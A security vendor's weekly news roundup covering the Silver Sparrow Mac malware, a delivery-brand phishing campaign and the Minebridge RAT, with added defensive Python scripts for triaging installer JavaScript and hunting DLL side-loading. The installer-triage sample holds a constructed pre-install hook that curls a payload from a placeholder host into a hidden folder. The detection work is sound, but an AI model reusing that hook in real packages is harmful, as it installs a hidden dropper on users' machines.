Cybersecurity Week in Review: 2/22/21
Posted by: GuidePoint Security
A mysterious attack on Mac computers, a phishing attack spoofing major shipping and delivery services companies, and a remote access trojan targeting security professionals are the focus of our news highlights from the last week.
Mac-based Malware Dubbed Silver Sparrow Discovered on 30K Machines
Last week, security researchers announced that they had discovered approximately 30,000 Macintosh computers infected with a malware they called “Silver Sparrow.” The Macs were located in 153 different countries, with the majority of infected machines found in the United States, United Kingdom, Canada, France, and Germany.
Researchers point out that what makes this malware unusual is that it ships as a universal binary, with native code for both Apple's new M1 (ARM64) chip and the older Intel-based Macs. It also executes its commands through the macOS Installer's JavaScript API, embedded in the package's Distribution file, rather than through the usual ‘preinstall’ or ‘postinstall’ shell scripts, something the researchers had not previously observed in macOS malware. Because commands run this way are spawned by the Installer process rather than by a shell script, they produce a different kind of telemetry, and detections keyed on script-launched command-line arguments may not fire.
Currently, the malware’s purpose remains a mystery, as researchers did not observe it deliver a final payload. Researchers also do not know how the malicious files reached users, although they suspect that malicious search engine results directed victims to download the PKG installers.
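The Installer-JavaScript angle described above is something a responder can check directly. What follows is an added triage script, not code from the article or from the researchers who analysed Silver Sparrow. It parses the Distribution file extracted from a suspect package (`pkgutil --expand suspect.pkg out/` or `xar -xf suspect.pkg` produces it), finds the JavaScript functions wired to the `installation-check` and `volume-check` hooks, which run before any file is laid down, and lists every `system.run` call together with its string arguments. The sample Distribution file is constructed for this example and does not reproduce the real malware's commands or paths; `example.invalid` and the `example_agent` directory are placeholders.

```python
"""Triage a macOS Installer Distribution file for JavaScript that shells out.

Added example; not code from the original article or from the Silver Sparrow
researchers. Extract the Distribution file with `pkgutil --expand suspect.pkg out/`.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# InstallerJS calls that execute a program. system.run is the documented call;
# the optional suffix also catches system.runOnce.
EXEC_CALL_RE = re.compile(r"system\.run(?:Once)?\s*\(")
FUNC_RE = re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{")
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
# Distribution elements whose `script` attribute runs JS before any payload is installed.
PRE_INSTALL_HOOKS = ("installation-check", "volume-check")


def _matching(text: str, start: int, open_ch: str, close_ch: str) -> int:
    """Index of the bracket closing the one at `start` (depth count; ignores strings)."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == open_ch:
            depth += 1
        elif text[i] == close_ch:
            depth -= 1
            if depth == 0:
                return i
    raise ValueError("unbalanced brackets in installer script")


def _exec_calls(js_body: str) -> list[list[str]]:
    """String-literal arguments of every system.run(...) call in a function body."""
    calls = []
    for m in EXEC_CALL_RE.finditer(js_body):
        open_paren = m.end() - 1
        close_paren = _matching(js_body, open_paren, "(", ")")
        args = js_body[open_paren + 1:close_paren]
        calls.append([a or b for a, b in STRING_RE.findall(args)])
    return calls


def triage_distribution(xml_text: str) -> list[dict]:
    """One finding per JS function that calls system.run, with the hook that triggers it."""
    root = ET.fromstring(xml_text)
    hooks = {}  # JS function name -> Distribution hook that calls it
    for tag in PRE_INSTALL_HOOKS:
        for el in root.iter(tag):
            m = re.match(r"\s*(\w+)\s*\(", el.get("script", ""))
            if m:
                hooks[m.group(1)] = tag
    findings = []
    for script in root.iter("script"):
        body = script.text or ""
        for fm in FUNC_RE.finditer(body):
            brace = fm.end() - 1
            fn_body = body[brace + 1:_matching(body, brace, "{", "}")]
            calls = _exec_calls(fn_body)
            if calls:
                findings.append({
                    "function": fm.group(1),
                    "hook": hooks.get(fm.group(1), "not referenced by a pre-install hook"),
                    "commands": calls,
                })
    return findings


# Constructed sample (not the real Silver Sparrow file): the installation-check hook
# runs JavaScript that shells out before any package payload is installed.
SAMPLE_DISTRIBUTION = """<installer-gui-script minSpecVersion="2">
  <title>update</title>
  <options customize="never" allow-external-scripts="no"/>
  <installation-check script="installationCheck()"/>
  <script><![CDATA[
function installationCheck() {
    system.run("/bin/sh", "-c", "mkdir -p ~/Library/Caches/example_agent && curl -fsSL https://example.invalid/agent -o ~/Library/Caches/example_agent/run");
    return true;
}
function helper() {
    return system.files.fileExistsAtPath("/Applications/Example.app");
}
]]></script>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default" title="update"/>
  <pkg-ref id="com.example.update" version="1.0">#update.pkg</pkg-ref>
</installer-gui-script>
"""

if __name__ == "__main__":
    for f in triage_distribution(SAMPLE_DISTRIBUTION):
        print(f"{f['hook']}: {f['function']}() runs {f['commands']}")
```

The bracket matcher does not account for braces or parentheses inside string literals, which is adequate for the short scripts installers carry but worth knowing if a sample deliberately obfuscates its JavaScript. A function that is defined but never referenced by a hook is still reported, since the `<script>` block can also be invoked from `<choice>` attributes that this example does not parse.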
More on this story can be found here, here, and here.
Significant Phishing Attack Spoofs Shipping/Delivery Companies
Last week an estimated 10,000 business accounts were targeted in two fairly large phishing campaigns. The campaigns used emails spoofing two major delivery service companies.
The purpose of the attacks appears to be the theft of Microsoft business email account credentials.
According to researchers, in addition to brand impersonation, the phishing emails combined social engineering and link redirects with enough content and design detail to convince the targeted users that the messages were genuine. The links took targets to phishing pages hosted on Quip and Google Firebase. Researchers pointed out that this was particularly problematic: both services have good reputations, so links pointing to them are more likely to pass URL reputation checks and other email security filters.
Once on the credential-harvesting page, the threat actors used an interesting technique of returning an error message when incorrect or ‘fake’ credentials were entered. Researchers surmise that this was either a back-end check to validate the harvested email addresses, or a way of collecting as many credentials and login options as possible: a victim who assumes they mistyped their password or used the wrong account will often try a different email/password combination.
The Covid-19 Connection
While this isn’t the first time that cybercriminals have spoofed delivery companies, it is notable that this fairly large phishing attack comes at a time when people are frequently using contactless delivery services to avoid the risks of in-person shopping.
Additional Details
More on the story can be found at these sources: 10K Microsoft Email Users Hit in Phishing Attack and 10K Targeted in Phishing Attacks.
Minebridge RAT Targeting Security Professionals
The remote access trojan (RAT) known as Minebridge has been given a makeover, and researchers believe it’s now targeting security researchers.
The updated version is delivered through a macro-enabled Microsoft Word document. If a target opens the attachment and allows the macros to run, Minebridge installs itself alongside a legitimate copy of a widely used remote desktop application (software that staff in IT management and security commonly have on their machines) and hijacks it, which gives the threat actors a channel to spy on victims or install additional malware. According to researchers, a number of the targets are security researchers.
Sophisticated Social Engineering
During their analysis, researchers found that the email delivering the malicious payload appears to come from a job candidate claiming threat intelligence analyst experience. The malware itself is embedded in an attached resume file. If the recipient opens the file and enables macros, the macro displays the message “File successfully converted from PDF” and then opens a decoy resume document.
The Minebridge dropper then writes a binary called defrender.exe, a legitimate, signed executable belonging to the remote desktop software that is susceptible to DLL side-loading: when launched, it loads a library named msi.dll from its own directory rather than from the Windows system directory. The attackers place their own msi.dll, the Minebridge RAT, next to it, so the trusted executable loads the malicious code. The RAT then attempts to connect to a command-and-control server controlled by the threat actors.
Once installed, the malware has the ability to engage in a variety of activities including executing payloads, downloading files, deleting and updating files, and executing arbitrary shell commands.
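Side-loading of the kind described above is detectable from image-load telemetry. What follows is an added example, not code from the article or from the researchers who analysed Minebridge. It scans records shaped like Sysmon Event ID 7 (ImageLoad) and flags a DLL that carries a System32 file name, is not one of the KnownDLLs that the Windows loader always maps from System32 (and so cannot be shadowed), and was loaded from the launching executable's own directory, which the default search order consults before System32, while being unsigned or signed by someone other than Microsoft. The records, paths and process IDs are constructed for the example; the two DLL name sets are short, partial lists, and the KnownDLLs set in particular should be enumerated from the registry on the build you are hunting on.

```python
"""Hunt for DLL side-loading in image-load telemetry.

Added example, not code from the article or the Minebridge researchers. The records
below are constructed and use a subset of the Sysmon Event ID 7 (ImageLoad) fields.
"""
from __future__ import annotations

import ntpath

# DLLs the loader always maps from System32 (the KnownDLLs registry key). They cannot
# be side-loaded from an application directory, so they are excluded. Assumption:
# partial list from a stock Windows 10; enumerate the key on your own build.
KNOWN_DLLS = {
    "kernel32.dll", "user32.dll", "gdi32.dll", "advapi32.dll", "ole32.dll", "oleaut32.dll",
    "shell32.dll", "shlwapi.dll", "ws2_32.dll", "rpcrt4.dll", "combase.dll", "msvcrt.dll",
}

# System DLL names that are NOT KnownDLLs and therefore resolve from the application
# directory first. Constructed short list; in production build it from System32\*.dll
# minus KNOWN_DLLS.
SHADOWABLE_SYSTEM_DLLS = {
    "msi.dll", "version.dll", "dwmapi.dll", "winmm.dll", "cryptbase.dll",
    "propsys.dll", "profapi.dll", "wtsapi32.dll", "uxtheme.dll",
}

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def sideload_reason(rec: dict) -> str | None:
    """Why an ImageLoad record looks like DLL side-loading, or None if it does not."""
    dll = ntpath.basename(rec["ImageLoaded"]).lower()
    dll_dir = ntpath.dirname(rec["ImageLoaded"]).lower()
    exe = ntpath.basename(rec["Image"])
    exe_dir = ntpath.dirname(rec["Image"]).lower()

    if dll not in SHADOWABLE_SYSTEM_DLLS:
        return None  # vendor DLLs and KnownDLLs are out of scope for this check
    if dll_dir in SYSTEM_DIRS:
        return None  # the genuine copy, loaded from where it lives
    if dll_dir != exe_dir:
        return None  # not the application-directory search-order case
    if rec.get("Signed", "false").lower() != "true":
        return f"{exe} loaded unsigned {dll} from its own directory {dll_dir}"
    if not rec.get("Signature", "").startswith("Microsoft"):
        return f"{exe} loaded {dll} signed by '{rec['Signature']}' (not Microsoft) from {dll_dir}"
    return None


def hunt(records: list[dict]) -> list[dict]:
    """Run sideload_reason over ImageLoad records and return the hits with context."""
    hits = []
    for rec in records:
        reason = sideload_reason(rec)
        if reason:
            hits.append({"ProcessId": rec["ProcessId"], "Image": rec["Image"], "reason": reason})
    return hits


# Constructed records (not real telemetry) using Sysmon Event ID 7 field names.
SAMPLE_IMAGE_LOADS = [
    {"ProcessId": 4120, "Image": r"C:\Program Files\ExampleRemote\rdtool.exe",
     "ImageLoaded": r"C:\Windows\System32\msi.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
    {"ProcessId": 4120, "Image": r"C:\Program Files\ExampleRemote\rdtool.exe",
     "ImageLoaded": r"C:\Program Files\ExampleRemote\rdtool_core.dll",
     "Signed": "true", "Signature": "Example Remote GmbH"},
    {"ProcessId": 5008, "Image": r"C:\Users\analyst\AppData\Local\Temp\review\defrender.exe",
     "ImageLoaded": r"C:\Users\analyst\AppData\Local\Temp\review\msi.dll",
     "Signed": "false", "Signature": ""},
    {"ProcessId": 5112, "Image": r"C:\Users\analyst\Downloads\tool\viewer.exe",
     "ImageLoaded": r"C:\Users\analyst\Downloads\tool\version.dll",
     "Signed": "true", "Signature": "Example Corp"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_IMAGE_LOADS):
        print(f"PID {hit['ProcessId']}: {hit['reason']}")
```

The check deliberately says nothing about the loading executable being signed: in the Minebridge case the executable is a genuine vendor binary, so its signature is exactly what makes the load look trustworthy. The signal is the system-named DLL sitting beside it without a Microsoft signature. Expect some noise from installers and games that ship their own `version.dll` or `winmm.dll` shims; triage those by hash and by whether the directory is user-writable.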
Security researchers currently attribute the attack to an advanced persistent threat (APT) group known as TA505.
Another Covid Connection
The targeting of a popular remote desktop application adds another interesting layer to the analysis. According to news reports, orders for this particular software increased with the outbreak of the pandemic as more employees began working remotely. Before the pandemic, remote work was limited to a few functions; now companies are adding and scaling software so that every position across the organization can work from home. In choosing this software as their host, the threat actors appear to know they are casting a wide net with a fairly good chance of reeling in at least a few victims.
Additional Information
More on the Minebridge RAT can be found here and here.
Final Words
Cybercriminals have become the proverbial “kid in the candy store” when it comes to leveraging the global Covid-19 pandemic for malicious purposes. Whether it is scam Covid vaccine websites (which we wrote about in this article) or taking advantage of the number of people shopping and working from home, there is no question that threat actors are leveraging every possible Covid angle for nefarious gain.
The statistics are unsettling. According to a July 2020 study, the number of unsecured Remote Desktop machines exposed to the internet increased by more than 40% during the pandemic. In addition, Covid can be linked to a long list of threats and cybercrime trends:
- Remote desktop protocol (RDP) attacks grew by 400% in just March and April of 2020.
- Email scams surged by 667% in the early pandemic months.
- Users are three times more likely to click on pandemic related phishing scams according to the Verizon 2020 Data Breach Investigations Report.
- An estimated 90% of newly created Covid/Coronavirus domains are scams.
- Over half a million Zoom account credentials are available on the dark web.
- There has been a 2000% increase in the number of malicious files distributed containing the word “zoom” in the file name.
- Ransomware has increased by between 72% and 105% during Covid.
Unfortunately, these are just a few of the frightening statistics related to Covid threats and scams, and the trend isn’t likely to abate anytime soon.
If the Covid pandemic teaches us anything from a cybersecurity perspective, it is that many companies are woefully unprepared to manage security in large-scale business disruption events.
Cyberattacks that are the result of some major local, national, or global event are a known risk. Covid isn’t the first, and it won’t be the last. Businesses need to be prepared for it.